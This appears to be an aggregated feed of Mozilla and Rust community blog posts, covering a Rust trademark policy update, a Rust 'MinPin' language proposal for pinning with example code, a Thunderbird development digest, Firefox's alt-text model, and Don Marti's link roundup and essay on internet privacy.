The Rust Programming Language Blog: Next Steps on the Rust Trademark Policy

As many of you know, the Rust language trademark policy has been the subject of an extended revision process dating back to 2022. In 2023, the Rust Foundation released an updated draft of the policy for input following an initial survey about community trademark priorities from the previous year along with review by other key stakeholders, such as the Project Directors. Many members of our community were concerned about this initial draft and shared their thoughts through the feedback form. Since then, the Rust Foundation has continued to engage with the Project Directors, the Leadership Council, and the wider Rust project (primarily via all@) for guidance on how to best incorporate as much feedback as possible.

After extensive discussion, we are happy to circulate an updated draft with the wider community today for final feedback. An effective trademark policy for an open source community should reflect our collective priorities while remaining legally sound. While the revised trademark policy cannot perfectly address every individual perspective on this important topic, its goal is to establish a framework to help guide appropriate use of the Rust trademark and reflect as many common values and interests as possible. In short, this policy is designed to steer our community toward a shared objective: to maintain and protect the integrity of the Rust programming language.

The Leadership Council is confident that this updated version of the policy has addressed the prevailing concerns about the initial draft and honors the variety of voices that have contributed to its development. Thank you to those who took the time to submit well-considered feedback for the initial draft last year or who otherwise participated in this long-running process to update our policy to continue to satisfy our goals.

Please review the updated Rust trademark policy here, and share any critical concerns you might have via this form by November 20, 2024. The Foundation has also published a blog post which goes into more detail on the changes made so far. The Leadership Council and Project Directors look forward to reviewing concerns raised and approving any final revisions prior to an official update of the policy later this year.

Niko Matsakis: MinPin: yet another pin proposal

This post floats a variation of boats’ UnpinCell proposal that I’m calling MinPin.1 MinPin’s goal is to integrate Pin into the language in a “minimally disruptive” way2 – and in particular a way that is fully backwards compatible. Unlike Overwrite, MinPin does not attempt to make Pin and &mut “play nicely” together. It does however leave the door open to add Overwrite in the future, and I think helps to clarify the positives and negatives that Overwrite would bring.

TL;DR: Key design decisions

Here is a brief summary of MinPin’s rules:

  • The pinned keyword can be used to get pinned variations of things:
    • In types, pinned P is equivalent to Pin<P>, so pinned &mut T and pinned Box<T> are equivalent to Pin<&mut T> and Pin<Box<T>> respectively.
    • In function signatures, pinned &mut self can be used instead of self: Pin<&mut Self>.
    • In expressions, pinned &mut $place is used to get a pinned &mut that refers to the value in $place.
  • The Drop trait is modified to have fn drop(pinned &mut self) instead of fn drop(&mut self).
    • However, impls of Drop are still permitted (even encouraged!) to use fn drop(&mut self), but it means that your type will not be able to use (safe) pin-projection. For many types that is not an issue; for futures or other “address sensitive” types, you should use fn drop(pinned &mut self).
  • The rules for field projection from a s: pinned &mut S reference are based on whether or not Unpin is implemented:
    • Projection is always allowed for fields whose type implements Unpin.
    • For fields whose types are not known to implement Unpin:
      • If the struct S is Unpin, &mut projection is allowed but not pinned &mut.
      • If the struct S is !Unpin and does not have a fn drop(&mut self) method, pinned &mut projection is allowed but not &mut.
      • If the type checker does not know whether S is Unpin or not, or if the type S has a Drop impl with fn drop(&mut self), neither form of projection is allowed for fields that are not Unpin.
  • There is a type struct Unpinnable<T> { value: T } that always implements Unpin.
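
As a point of reference, the Unpinnable type from the last rule is the one piece of this list that can be written in today’s Rust essentially as-is. A minimal sketch (the manual Unpin impl is safe to write):

struct Unpinnable<T> {
    value: T,
}

// Unconditionally Unpin: even when the enclosing struct is pinned, a field of
// type Unpinnable<T> can still be mutated, taken, or swapped through `&mut`.
impl<T> Unpin for Unpinnable<T> {}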

Design axioms

Before I go further, I want to lay out some of my design axioms (beliefs that motivate and justify my design).

  • Pin is part of the Rust language. Despite Pin being entirely a “library-based” abstraction at present, it is very much a part of the language semantics, and it deserves first-class support. It should be possible to create pinned references and do pin projections in safe Rust.
  • Pin is its own world. Pin is only relevant in specific use cases, like futures or in-place linked lists.
  • Pin should have zero-conceptual-cost. Unless you are writing a Pin-using abstraction, you shouldn’t have to know or think about pin at all.
  • Explicit is possible. Automatic operations are nice but it should always be possible to write operations explicitly when needed.
  • Backwards compatible. Existing code should continue to compile and work.

Frequently asked questions

For the rest of the post I’m just going to go into FAQ mode.

I see the rules, but can you summarize how MinPin would feel to use?

Yes. I think the rule of thumb would be this: for any given type, you should decide whether it cares about pinning or not.

Most types do not care about pinning. They just go on using &self and &mut self as normal. Everything works as today (this is the “zero-conceptual-cost” goal).

But some types do care about pinning. These are typically future implementations, but they could be other special-case things. In that case, you should explicitly implement !Unpin to declare yourself as pinnable. When you declare your methods, you have to make a choice:

  • Is the method read-only? Then use &self, that always works.
  • Otherwise, use &mut self or pinned &mut self, depending…
    • If the method is meant to be called before pinning, use &mut self.
    • If the method is meant to be called after pinning, use pinned &mut self.

This design works well so long as all mutating methods can be categorized into before-or-after pinning. If you have methods that need to be used in both settings, you have to start using workarounds – in the limit, you make two copies.

How does MinPin compare to UnpinCell?

Those of you who have been following the various posts in this area will recognize many elements from boats’ recent UnpinCell. While the proposals share many elements, there is one key difference between them that significantly changes how they would feel to use. Which is better overall is not yet clear to me.

Let’s start with what they have in common. Both propose syntax for pinned references/borrows (albeit slightly different syntax) and both include a type for “opting out” from pinning (the eponymous UnpinCell<T> in UnpinCell, Unpinnable<T> in MinPin). Both also have a similar “special case” around Drop in which writing a drop impl with fn drop(&mut self) disables safe pin-projection.

Where they differ is how they manage generic structs like WrapFuture<F>, where it is not known whether or not they are Unpin.

struct WrapFuture<F: Future> {
    future: F,
}

Given self: pinned &mut WrapFuture<F>, the question is whether we can project the field future:

impl<F: Future> WrapFuture<F> {
    fn method(pinned &mut self) {
        let f = pinned &mut self.future;
        //      -----------------------
        //      Is this allowed?
    }
}

There is a specific danger case that both sets of rules are trying to avoid. Imagine that WrapFuture<F> implements Unpin but F does not – e.g., imagine that you have an impl<F: Future> Unpin for WrapFuture<F>. In that case, the referent of the pinned &mut WrapFuture<F> reference is not actually pinned, because the type is unpinnable. If we permitted the creation of a pinned &mut F, where F: !Unpin, we would be under the (mistaken) impression that F is pinned. Bad.

UnpinCell handles this case by saying that projecting from a pinned &mut is only allowed so long as there is no explicit impl of Unpin for WrapFuture (“if [WrapFuture<F>] implements Unpin, it does so using the auto-trait mechanism, not a manually written impl”). Basically: if the user doesn’t say whether the type is Unpin or not, then you can do pin-projection. The idea is that if the self type is Unpin, that will only be because all fields are Unpin (in which case it is fine to make pinned &mut references to them); if the self type is not Unpin, then the field future is pinned, so it is safe.

In contrast, in MinPin, this case is only allowed if there is an explicit !Unpin impl for WrapFuture:

impl<F: Future> !Unpin for WrapFuture<F> {
    // This impl is required in MinPin, but not in UnpinCell
}

Explicit negative impls are not allowed on stable, but they were included in the original auto trait RFC. The idea is that a negative impl is an explicit, semver-binding commitment not to implement a trait. This is different from simply not including an impl at all, which allows for impls to be added later.
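
For concreteness, this is roughly what that opt-out looks like on today’s nightly under the negative_impls feature (the type name here is just an illustration; on stable, the usual workaround is a PhantomPinned marker field instead):

#![feature(negative_impls)] // nightly-only, as noted above

struct MyFuture {
    // ... address-sensitive state ...
}

// A semver-binding promise: `MyFuture` will never implement `Unpin`,
// so it is always treated as pinnable.
impl !Unpin for MyFuture {}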

Why would you prefer MinPin over UnpinCell or vice versa?

I’m not totally sure which of these is better. I came to the !Unpin impl based on my axiom that pin is its own world – the idea was that it was better to push types to be explicitly unpin all the time than to have “dual-mode” types that masquerade as sometimes pinned and sometimes not.

In general I feel like it’s better to justify language rules by the presence of a declaration than the absence of one. So I don’t like the idea of saying “the absence of an Unpin impl allows for pin-projection” – after all, adding impls is supposed to be semver-compliant. Of course, that’s much less true for auto traits, but it can still be true.

In fact, Pin has had some unsoundness in the past based on unsafe reasoning that was justified by the lack of an impl. We assumed that &T could never implement DerefMut, but it turned out to be possible to add weird impls of DerefMut in very specific cases. We fixed this by adding an explicit impl<T> !DerefMut for &T.

On the other hand, I can imagine that many explicitly implemented futures might benefit from being able to be ambiguous about whether they are Unpin.

What does your design axiom “Pin is its own world” mean?

The way I see it is that, in Rust today (and in MinPin, pinned places, UnpinCell, etc), if you have a T: !Unpin type (that is, a type that is pinnable), it lives a double life. Initially, it is unpinned, and you can move it, &-ref it, or &mut-ref it, just like any other Rust value. But once a !Unpin value becomes pinned to a place, it enters a different state, in which you can no longer move it or use &mut; you have to use pinned &mut:

    Unpinned: can access 'v' with '&' and '&mut'
        |
        |  pin 'v' in place (only if T is '!Unpin')
        v
    Pinned: can access 'v' with '&' and 'pinned &mut'

One-way transitions like this limit the amount of interop and composability you get in the language. For example, if my type has &mut methods, I can’t use them once the type is pinned, and I have to use some workaround, such as duplicating the method with pinned &mut.3 In this specific case, however, I don’t think this transition is so painful, and that’s because of the specifics of the domain: futures go through a pretty hard state change where they start in “preparation mode” and then eventually start executing. The set of methods you need at these two phases is quite distinct. So this is what I meant by “pin is its own world”: pin is not very interoperable with Rust, but this is not as bad as it sounds, because you don’t often need that kind of interoperability.
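
To make the two phases concrete, here is how that state change already looks in today’s Rust using the std::pin::pin! macro; the Pin<&mut _> you get back is what MinPin would spell pinned &mut:

use std::pin::pin;

fn two_phases() {
    // Unpinned phase: the future is an ordinary value; it can be moved around,
    // stored in a struct, returned, etc.
    let fut = async { 1 + 1 };
    let staged = fut; // an ordinary move

    // Pinned phase: pin it to this stack slot. From here on we only ever
    // touch it through `Pin<&mut _>` (MinPin's `pinned &mut`).
    let mut fut = pin!(staged);
    let _reborrow = fut.as_mut();
}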

How would Overwrite affect pin being in its own world?

With Overwrite, when you pin a value in place, you just gain the ability to use pinned &mut, you don’t give up the ability to use &mut:

    Unpinned: can access 'v' with '&' and '&mut'
        |
        |  pin 'v' in place (only if T is '!Unpin')
        v
    Pinned: can additionally access 'v' with 'pinned &mut'

Making pinning into a “superset” of the capabilities of the unpinned state means that pinned &mut can be coerced into an &mut (it could even be a “true subtype”, in Rust terms). This in turn means that a pinned &mut Self method can invoke &mut self methods, which helps to make pin feel like a smoothly integrated part of the language.3

So does the axiom mean you think Overwrite is a bad idea?

Not exactly, but I do think that if Overwrite is justified, it is not on the basis of Pin, it is on the basis of immutable fields. If you just look at Pin, then Overwrite does make Pin work better, but it does that by limiting the capabilities of &mut to those that are compatible with Pin. There is no free lunch! As Eric Holk memorably put it to me in privmsg:

It seems like there’s a fixed amount of inherent complexity to pinning, but it’s up to us how we distribute it. Pin keeps it concentrated in a small area which makes it seem absolutely terrible, because you have to face the whole horror at once.4

I think Pin as designed is a “zero-conceptual-cost” abstraction, meaning that if you are not trying to use it, you don’t really have to care about it. That’s worth maintaining, if we can. If we are going to limit what &mut can do, the reason to do it is primarily to get other benefits, not to benefit pin code specifically.

To be clear, this is largely a function of where we are in Rust’s evolution. If we were still in the early days of Rust, I would say Overwrite is the correct call. It reminds me very much of the IMHTWAMA, the core “mutability xor sharing” rule at the heart of Rust’s borrow checker. When we decided to adopt the current borrow checker rules, the code was about 85-95% in conformance. That is, although there was plenty of aliased mutation, it was clear that “mutability xor sharing” was capturing a rule that we already mostly followed, but not completely. Because combining aliased state with memory safety is more complicated, that meant that a small minority of code was pushing complexity onto the entire language. Confining shared mutation to types like Cell and Mutex made most code simpler at the cost of more complexity around shared state in particular.

There’s a similar dynamic around replace and swap. Replace and swap are only used in a few isolated places and in a few particular ways, but all code has to be more conservative to account for that possibility. If we could go back, I think limiting Replace to some kind of Replaceable<T> type would be a good move, because it would mean that the more common case can enjoy the benefits: fewer borrow check errors and more precise programs due to immutable fields and the ability to pass an &mut SomeType and be sure that your callee is not swapping the value under your feet (useful for the “scope pattern” and also enables Pin<&mut> to be a subtype of &mut).

Why did you adopt pinned &mut and not &pin mut as the syntax?

The main reason was that I wanted a syntax that scaled to Pin<Box<T>>. But also the pin! macro exists, making the pin keyword somewhat awkward (though not impossible).

One thing I was wondering about is the phrase “pinned reference” or “pinned pointer”. On the one hand, it is really a reference to a pinned value (which suggests &pin mut). On the other hand, I think this kind of ambiguity is pretty common. The main thing I have found is that my brain has trouble with Pin<P> because it wants to think of Pin as a “smart pointer” versus a modifier on another smart pointer. pinned Box<T> feels much better this way.
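
For comparison, this is today’s spelling of the boxed case that motivated that choice; under MinPin the return type could instead be written pinned Box<dyn Future<Output = u32>>:

use std::future::Future;
use std::pin::Pin;

fn boxed() -> Pin<Box<dyn Future<Output = u32>>> {
    // Box::pin allocates and pins in one step.
    Box::pin(async { 42 })
}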

Can you show me an example? What about the MaybeDone example?

Yeah, totally. So boats’ pinned places post introduced two futures, MaybeDone and Join. Here is how MaybeDone would look in MinPin, along with some inline comments:

enum MaybeDone<F: Future> {
    Polling(F),
    Done(Unpinnable<Option<F::Output>>),
    //   ---------- see below
}

impl<F: Future> !Unpin for MaybeDone<F> { }
//              -----------------------
//
// `MaybeDone` is address-sensitive, so we
// opt out from `Unpin` explicitly. I assumed
// opting out from `Unpin` was the *default* in
// my other posts.

impl<F: Future> MaybeDone<F> {
    fn maybe_poll(pinned &mut self, cx: &mut Context<'_>) {
        if let MaybeDone::Polling(fut) = self {
            //                    ---
            // This is in fact pin-projection, although
            // it's happening implicitly as part of pattern
            // matching. `fut` here has type `pinned &mut F`.
            // We are permitted to do this pin-projection
            // to `F` because we know that `Self: !Unpin`
            // (because we declared that to be true).
            
            if let Poll::Ready(res) = fut.poll(cx) {
                *self = MaybeDone::Done(Unpinnable { value: Some(res) });
            }
        }
    }

    fn is_done(&self) -> bool {
        matches!(self, &MaybeDone::Done(_))
    }

    fn take_output(pinned &mut self) -> Option<F::Output> {
        //         ----------------
        //     This method is called after pinning, so it
        //     needs a `pinned &mut` reference...  

        if let MaybeDone::Done(res) = self {
            res.value.take()
            //  ------------
            //
            //  ...but take is an `&mut self` method
            //  and `F::Output: Unpin` is known to be true.
            //  
            //  Therefore we have made the type in `Done`
            //  be `Unpinnable`, so that we can do this
            //  swap.
        } else {
            None
        }
    }
}

Can you translate the Join example?

Yep! Here is Join:

struct Join<F1: Future, F2: Future> {
    fut1: MaybeDone<F1>,
    fut2: MaybeDone<F2>,
}

impl<F1: Future, F2: Future> !Unpin for Join<F1, F2> { }
//                           ------------------------
//
// Join is a custom future, so implement `!Unpin`
// to gain access to pin-projection.

impl<F1: Future, F2: Future> Future for Join<F1, F2> {
    type Output = (F1::Output, F2::Output);

    fn poll(pinned &mut self, cx: &mut Context<'_>) -> Poll<Self::Output> {
        // The calls to `maybe_poll` and `take_output` below
        // are doing pin-projection from `pinned &mut self`
        // to a `pinned &mut MaybeDone<F1>` (or `F2`) type.
        // This is allowed because we opted out from `Unpin`
        // above.

        self.fut1.maybe_poll(cx);
        self.fut2.maybe_poll(cx);
        
        if self.fut1.is_done() && self.fut2.is_done() {
            let res1 = self.fut1.take_output().unwrap();
            let res2 = self.fut2.take_output().unwrap();
            Poll::Ready((res1, res2))
        } else {
            Poll::Pending
        }
    }
}

What’s the story with Drop and why does it matter?

Drop’s current signature takes &mut self. But recall that once a !Unpin type is pinned, it is only safe to use pinned &mut. This is a combustible combination. It means that, for example, I can write a Drop that uses mem::replace or swap to move values out from my fields, even though they have been pinned.
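
To see the hazard concretely in today’s Rust: nothing stops a fn drop(&mut self) body from moving a pinned field’s contents out from under any pointers into it (the type and field here are illustrative):

use std::mem;

struct SelfRef {
    data: String,
    // imagine a raw pointer into `data`, set up after pinning
}

impl Drop for SelfRef {
    fn drop(&mut self) {
        // `&mut self` lets us move the field's contents out...
        let _stolen = mem::take(&mut self.data);
        // ...silently breaking any address-sensitive invariant tied to `data`.
    }
}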

For types that are always Unpin, this is no problem, because &mut self and pinned &mut self are equivalent. For types that are always !Unpin, I’m not too worried, because Drop as-is is a poor fit for them, and pinned &mut self will be better.

The tricky bit is types that are conditionally Unpin. Consider something like this:

struct LogWrapper<T> {
    value: T,
}

impl<T> Drop for LogWrapper<T> {
    fn drop(&mut self) {
        ...
    }
}

At least today, whether or not LogWrapper is Unpin depends on whether T: Unpin, so we can’t know it for sure.

The solution that boats and I both landed on effectively creates three categories of types:5

  • those that implement Unpin, which are unpinnable;
  • those that do not implement Unpin but which have fn drop(&mut self), which are unsafely pinnable;
  • those that do not implement Unpin and do not have fn drop(&mut self), which are safely pinnable.

The idea is that using fn drop(&mut self) puts you in this purgatory category of being “unsafely pinnable” (it might be more accurate to say being “maybe unsafely pinnable”, since often at compilation time with generics we won’t know if there is an Unpin impl or not). You don’t get access to safe pin projection or other goodies, but you can do projection with unsafe code (e.g., the way the pin-project-lite crate does it today).
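
For reference, this is the shape of that workaround today with pin-project-lite: the unsafe pin-projection is hidden inside the macro, and the #[pin] field comes back as Pin<&mut F> from the generated project() method:

use std::future::Future;
use std::pin::Pin;
use std::task::{Context, Poll};

use pin_project_lite::pin_project;

pin_project! {
    struct WrapFuture<F> {
        #[pin]
        future: F,
    }
}

impl<F: Future> Future for WrapFuture<F> {
    type Output = F::Output;

    fn poll(self: Pin<&mut Self>, cx: &mut Context<'_>) -> Poll<Self::Output> {
        // `project()` performs the pin-projection; fields without `#[pin]`
        // would come back as plain `&mut` references instead.
        self.project().future.poll(cx)
    }
}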

It feels weird to have Drop let you use &mut self when other traits don’t.

Yes, it does, but in fact any method whose trait uses pinned &mut self can be implemented safely with &mut self so long as Self: Unpin. So we could just allow that in general. This would be cool because many hand-written futures are in fact Unpin, and so they could implement the poll method with &mut self.
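
This is already how it plays out with today’s Pin: when Self: Unpin, a self: Pin<&mut Self> method can simply drop down to &mut self via Pin::get_mut. A small sketch:

use std::pin::Pin;

struct Counter {
    n: u32, // every field is Unpin, so Counter: Unpin
}

impl Counter {
    fn bump(&mut self) {
        self.n += 1;
    }

    // The "pinned" signature can safely defer to the `&mut` method,
    // because `get_mut` is available whenever `Self: Unpin`.
    fn bump_pinned(self: Pin<&mut Self>) {
        self.get_mut().bump();
    }
}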

Wait, so if Unpin types can use &mut self, why do we need special rules for Drop?

Well, it’s true that an Unpin type can use &mut self in place of pinned &mut self, but in fact we don’t always know when types are Unpin. Moreover, per the zero-conceptual-cost axiom, we don’t want people to have to know anything about Pin to use Drop. The obvious approaches I could think of all either violated that axiom or just… well… seemed weird:

  • Permit fn drop(&mut self) but only if Self: Unpin seems like it would work, since most types are Unpin. But in fact types, by default, are only Unpin if their fields are Unpin, and so generic types are not known to be Unpin. This means that if you write a Drop impl for a generic type and you use fn drop(&mut self), you will get an error that can only be fixed by implementing Unpin unconditionally. Because “pin is its own world”, I believe adding the impl is fine, but it violates “zero-conceptual-cost” because it means that you are forced to understand what Unpin even means in the first place.
  • To address that, I considered treating fn drop(&mut self) as implicitly declaring Self: Unpin. This doesn’t violate our axioms but just seems weird and kind of surprising. It’s also backwards incompatible with pin-project-lite.

These considerations led me to conclude that the current design kind of puts us in a place where we want three categories. I think in retrospect it’d be better if Unpin were implemented by default but not as an auto trait (i.e., all types were unconditionally Unpin unless they declare otherwise), but oh well.

What is the forwards compatibility story for Overwrite?

I mentioned early on that MinPin could be seen as a first step that can later be extended with Overwrite if we choose. How would that work?

Basically, if we did the s/Unpin/Overwrite/ change, then we would

  • rename Unpin to Overwrite (literally rename, they would be the same trait);
  • prevent overwriting the referent of an &mut T unless T: Overwrite (or replacing, swapping, etc).

These changes mean that &mut T is pin-preserving. If T: !Overwrite, then T may be pinned, but then &mut T won’t allow it to be overwritten, replaced, or swapped, and so pinning guarantees are preserved (and then some, since technically overwrites are ok, just not replacing or swapping). As a result, we can simplify the MinPin rules for pin-projection to the following:

Given a reference s: pinned &mut S, the rules for projection of the field f are as follows:

  • &mut projection is allowed via &mut s.f.
  • pinned &mut projection is allowed via pinned &mut s.f if S: !Unpin.

What would it feel like if we adopted Overwrite?

We actually got a bit of a preview when we talked about MaybeDone. Remember how we had to introduce Unpinnable around the final value so that we could swap it out? If we adopted Overwrite, I think the TL;DR of how code would be different is that most any code that today uses std::mem::replace or std::mem::swap would probably wind up using an explicit Unpinnable-like wrapper. I’ll cover this later.

This goes a bit to show what I meant about there being a certain amount of inherent complexity that we can choose to distribute: in MinPin, this pattern of wrapping “swappable” data is isolated to pinned &mut self methods in !Unpin types. With Overwrite, it would be more widespread (but you would get more widespread benefits, as well).

Conclusion

My conclusion is that this is a fascinating space to think about!6 So fun.


  1. Hat tip to Tyler Mandry and Eric Holk who discussed these ideas with me in detail. ↩︎

  2. MinPin is the “minimal” proposal that I feel meets my desiderata; I think you could devise a maximally minimal proposal that is even smaller if you truly wanted. ↩︎

  3. It’s worth noting, though, that coercions and subtyping only go so far. For example, &mut can be coerced to &, but we often need methods that return “the same kind of reference they took in”, which can’t be managed with coercions. That’s why you see things like last and last_mut. ↩︎ ↩︎

  4. I would say that the current complexity of pinning is, in no small part, due to accidental complexity, as demonstrated by the recent round of exploration, but Eric’s wider point stands. ↩︎

  5. Here I am talking about the category of a particular monomorphized type in a particular version of the crate. At that point, every type either implements Unpin or it doesn’t. Note that at compilation time there is more grey area, as there can be types that may or may not be pinnable, etc. ↩︎

  6. Also that I spent way too much time iterating on this post. JUST GONNA POST IT. ↩︎

Mozilla Thunderbird: Thunderbird Monthly Development Digest: October 2024

Hello again Thunderbird Community! The last few months have involved a lot of learning for me, but I have a much better appreciation (and appetite!) for the variety of challenges and opportunities ahead for our team and the broader developer community. Catch up with last month’s update, and here’s a quick summary of what’s been happening across the different teams:

Exchange Web Services support in Rust

An important member of our team left recently and while we’ll very much miss their spirit and leadership, we all learned a lot and are in a good position to carry the project forwards. We’ve managed to unstick a few pieces of the backlog and have a few sprints left to complete work on move/copy operations, protocol logging and priority two operations (flagging messages, folder rename & delete, etc). New team members have moved past the most painful stages and have patches that have landed. Kudos to the patient mentors involved in this process!

QR Code Cross-Device Account Import

Thunderbird for Android launched this week, and the desktop client (Daily, Beta & ESR 128.4.0) now provides a simple and secure account transfer mechanism, so that account settings don’t have to be re-entered for new users of the mobile app. Download Thunderbird for Android from the Play store.

Account Hub

Development of a refreshed account hub is moving forward apace and with the critical path broken down into sprints, our entire front end team is working to complete things in the next two weeks. Meta bug & progress tracking.

Clean up on aisle 2

In addition to our project work, we’ve had to be fairly nimble this month, with a number of upstream changes breaking our builds and pipelines. We get a ton of benefit from the platforms we inherit but at times it feels like we’re dealing with many things out of our control. Mental note: stay calm and focus on future improvements!

Global Database, Conversation View & folder corruption issues

On top of the conversation view feature and core refactoring to tackle the inner workings of thread-safe folder and message manipulation, work to implement a long term database replacement is well underway. Preliminary patches are regularly pumped into the development ecosystem for discussion and review, for which we’re very excited!

In-App Notifications

With phase 1 of this project now complete, we’ve scoped out additions that will make it even more flexible and suitable for a variety of purposes. Beta users will likely see the first notifications coming in November, so keep your eyes peeled. Meta Bug & progress tracking.

New Features Landing Soon

Several requested features are expected to debut this month (or very soon) and include…

As usual, if you want to see things as they land, and help us squash some early bugs, you can always check the pushlog and try running daily, which would be immensely helpful for catching things early.

See you next month.

Toby Pilling

Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest: October 2024 appeared first on The Thunderbird Blog.

The Mozilla Blog: Help us improve our alt text generation model

Image generated by DALL-E in response to a request for a photorealistic image of a fox standing in a grassy landscape.

Firefox 130 introduces automatic alt text for PDF images and an improved alt text flow. In addition to protecting users’ privacy with a small language model that operates locally on their device, these improvements help ensure more images receive alt text, resulting in more accessible PDFs.

You can read more about our work on the model in the earlier Hacks blog post, Experimenting with local alt text generation in Firefox.

The work on the model happens outside of the mozilla-central code base, but as with the rest of the Firefox code, we want to keep the process open to our community. The language models used in our product are just weight files, and we want to ensure the Mozilla community understands how they were built and can help improve them. The open source AI definition from OSI is a work in progress, and our long-term aspiration is to follow the OSI’s guidelines for our local models.

Here’s how you can contribute to improving the model and helping with the accessibility of PDF documents. 

What can be improved?

The first version of the model is a work in progress, and it will make mistakes, especially when describing complex images. This is why we designed the feature to:

  • Encourage human review so that our users can correct inaccuracies and include any missing details before saving the alt text.
  • Set expectations for users interacting with PDFs that have alt text generated:
    • When you see the “This alt text was created automatically” message below the text box in the alt text editor, you’ll know that the alt text was generated using our model.
    • All users who are reading the PDF outside of the Firefox editor will experience a disclaimer that comes before the alt text. This is so people reading the alt text with a screen reader or directly on the PDF can be informed that the alt text was not human-generated. For example: “Created automatically: [alt text description will go here]”.

We hope to improve the model over time, and, as with Firefox’s source code, anyone interested in helping us refine it is welcome to contribute. You don’t have to be an AI expert – but if you are an expert and spot specific areas of improvement, we’d love to hear from you.

You can contribute by adding a new issue to our repository and choosing a topic from the issue templates:

  • Model architecture
  • Training Data
  • Training code

Here’s some information to help you file an issue under one of these topics:

Model architecture

Our vision encoder-decoder model has 180M parameters and is based on two pre-trained models: a ViT image encoder and a distilled GPT-2 text decoder.

The ViT model was pre-trained on millions of images labeled with the ImageNet-21k classes, which use 21,000 words from the WordNet hierarchy to identify objects in images.

The version of GPT-2 used for the text decoder is a distilled version of the GPT-2 model – a process that is used to transfer knowledge from a model to a smaller model with minimal accuracy loss. That makes it a good trade-off in terms of size and accuracy. Additionally, we built a ~800-word stop list to avoid generating profanity. 

The whole model is 180M parameters and was quantized by converting float32 weights to int8, allowing us to shrink the size on disk to ~180MB, which sped up inference time in the browser.

There are many other architectures that could have been used for this job, or different quantization levels. If you believe there is a better combination, we’d love to try it.

The constraints are:

  • Everything needs to be open source under a permissive license like APLv2.
  • The model needs to be converted into ONNX using optimum.
  • The model needs to work in Transformers.js.

Training data

To train our model, we initially used the COCO and Flickr30k datasets and eventually adapted them to remove some of the annotator biases we’ve found along the way:

  • Some annotators use gender-specific descriptions. People in an image may be described as a man or a woman, which can lead to the model misgendering people. For instance, a person on a skateboard is almost always described as a man. Similar problems exist with age-specific terms (e.g., man, boy, etc.). 
  • Some descriptions may also use less-than-inclusive language or be culturally or personally offensive in some rare cases. For instance, we have spotted annotations that were only acceptable for use by and within specific demographics, were replaced in common speech by other terms decades ago, or imposed a reductive value (e.g., sexy).

To deal with these issues, we rewrote annotations with GPT-4o using a prompt that asks for a short image description. You can find that code here, and the transformed datasets are published on Hugging Face: Mozilla/flickr30k-transformed-captions-gpt4o and Mozilla/coco-gpt4o. You can read more about our process here.

Training our model using these new annotations greatly improved the results; however, we still detected some class imbalance – some types of images, like transportation, are underrepresented, and some are overrepresented, like… cats. To address this, we’ve created a new complementary dataset using Pexels, with this script and GPT-4o annotations. You can find it at Mozilla/pexels-gpt4o.

We know this is still insufficient, so if you would like to help us improve our datasets, here’s what you can do:

  • If you used the feature and detected a poorly described image, send it to us so we can add it to our training datasets.
  • Create a dataset on HuggingFace to fix one or more specific class imbalances.
  • Create a dataset on HuggingFace to simply add more diverse, high-quality data.

We ask the datasets to contain the following fields:

  • Image: the image in PNG, with a maximum width or height of 700 pixels.
  • Source: the source of the image.
  • License: the license of the image. Please ensure the images you’re adding have public domain or public-domain-equivalent licenses, so they can be used for training without infringing on the rights of copyright holders. 

This will allow us to automatically generate descriptions using our prompt, and to create a new dataset that we will include in the training loop.

Training code

To train the model, we are using Transformers’ Seq2SeqTrainer in a somewhat standard way (see more details here).

Let us know if you spot a problem or find a potential improvement in the code or in our hyperparameters!

The post Help us improve our alt text generation model appeared first on The Mozilla Blog.

Don Marti: links for 3 November 2024

Remote Startups Will Win the War for Top Talent Ironically, in another strike against the spontaneous collaboration argument, a study of two Fortune 500 headquarters found that transitioning from cubicles to an open office layout actually reduced face-to-face interactions by 70 percent.

Why Strava Is a Privacy Risk for the President (and You Too) Not everybody uses their real names or photos on Strava, but many do. And if a Strava account is always in the same place as the President, you can start to connect a few dots.

Why Getting Your Neighborhood Declared a Historic District Is a Bad Idea Historic designations are commonly used to control what people can do with their own private property, and can be a way of creating a kind of “backdoor” homeowners association. Some historic neighborhoods (many of which have dubious claims to the designation) around the country have HOA-like restrictions on renovations, repairs, and even landscaping.

Donald Trump Talked About Fixing McDonald’s Ice Cream Machines. Lina Khan Actually Did. Back in March, the FTC submitted a comment to the US Copyright Office asking to extend the right to repair certain equipment, including commercial soft-serve equipment.

An awful lot of FOSS should thank the Academy Linux and open source in general seem to be huge components of the movie special effects industry – to an extent that we had not previously realized. (unless you have a stack of old Linux Journal back issues from the early 2000s—we did a lot of movie covers at the time that much of this software was being developed.)

Using an 8K TV as a Monitor For programming, word processing, and other productive work, consider getting an 8K TV instead of a multi-monitor setup. An 8K TV will have superior image quality, resolution, and versatility compared to multiple 4K displays, at roughly the same size. (huge TVs are an under-rated, subsidized technology, like POTS lines. Most or all of the huge TVs available today are smart and sold with the expectation that they’ll drive subscription and advertising revenue, which means a discount for those who use them as monitors.)

Suchir Balaji, who spent four years at OpenAI, says OpenAI’s use of copyrighted data broke the law and failed to meet fair use criteria; he left in August 2024 Mr. Balaji believes the threats are more immediate. ChatGPT and other chatbots, he said, are destroying the commercial viability of the individuals, businesses and internet services that created the digital data used to train these A.I. systems.

The Unlikely Inventor of the Automatic Rice Cooker Fumiko, the mother of six children, spent five years researching and testing to document the ideal recipe. She continued to make rice three times a day, carefully measuring water-to-rice ratios, noting temperatures and timings, and prototyping rice-cooker designs. Conventional wisdom was that the heat source needed to be adjusted continuously to guarantee fluffy rice, but Fumiko found that heating the water and rice to a boil and then cooking for exactly 20 minutes produced consistently good results.

Comments on TSA proposal for decentralized nonstandard ID requirements Compliance with the REAL-ID Act requires a state to electronically share information concerning all driver’s licenses and state-issued IDs with all other states, but not all states do so. Because no state complies with this provision of the REAL-ID Act, or could do so unless and until all states do so, no state-issued driver’s licenses or ID cards comply with the REAL-ID Act.

Don Marti: or we could just not

previously: Sunday Internet optimism

The consensus, dismal future of the Internet is usually wrong. Dystopias make great fiction, but the Internet is surprisingly good at muddling through and reducing each one to nuisance level.

  • We don’t have Clipper Chip dystopia that would have put backdoors in all cryptography.

  • We don’t have software patent cartel dystopia that would have locked everyone in to limited software choices and functionality, and a stagnant market.

  • We don’t have Fritz Chip dystopia that would have mandated Digital Rights Management on all devices.

None of these problems have gone away entirely—encryption backdoors, patent trolls, and DRM are all still there—but none have reached either Internet-wide catastrophe level or faded away entirely.

Today’s hottest new dystopia narrative is that we’re going to end up with surveillance advertising features in web browsers. They’ll be mathematically different from old-school cookie tracking, so technically they won’t make it possible to identify anyone individually, but they’ll still impose the same old surveillance risks on users, since real-world privacy risks are collective.

